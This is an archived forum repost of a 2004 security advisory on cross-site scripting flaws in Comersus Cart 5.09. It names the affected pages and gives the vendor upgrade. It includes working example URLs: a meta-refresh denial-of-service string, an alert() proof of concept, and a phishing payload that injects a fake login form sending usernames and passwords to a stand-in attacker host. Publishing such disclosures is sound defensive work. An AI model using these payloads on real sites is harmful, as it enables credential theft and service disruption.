Comersus Cart Cross-site Scripting Vulnerability

Full Version: Comersus Cart Cross-site Scripting Vulnerability

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Jul 7 2004, 07:04 PM

QUOTE

Release Date:
July 6, 2004

Severity:
High

Vendor:
Comersus Open Technologies

Software:
Tested on Comersus Cart 5.09
Previous versions may also be affected.

Remote:
Remotely executed from any web browser

Technical Details:
The malicious user is able to compromise the parameters to invoke a
Cross-Site Scripting attack. This can be used to take advantage of the trust
between a client and server allowing the malicious user to execute malicious
JavaScript on the client's machine or perform a denial of service shutting
down IIS.

Pages Affected:
/comersus/store/comersus_customerAuthenticateForm.asp
/comersus/backofficeLite/comersus_backoffice_message.asp
/comersus/store/comersus_supportError.asp
/comersus/store/comersus_message.asp

Examples:

Denial of Service:
http://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equ
iv='refresh'content='0'>

Phishing:
http://[VICTIM]/comersus/store/comersus_message.asp?message=<form%20action="
http://www.evilhacker.com/save2db.asp"...<input%20nam
e="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="pass
word"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submi
t"%20value="Login"></form>

XSS:
http://[VICTIM]/comersus/backofficeLite/comersus_backoffice_message.asp?mess
age=<script>alert("VULNERABLE_TO_XSS")</script>

Vendor Status:
Upgrade to 5.098
http://www.comersus.com/

Credit:
Discovered By: Thomas Ryan
Provide Security

Source: http://seclists.org/lists/bugtraq/2004/Jul/0071.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.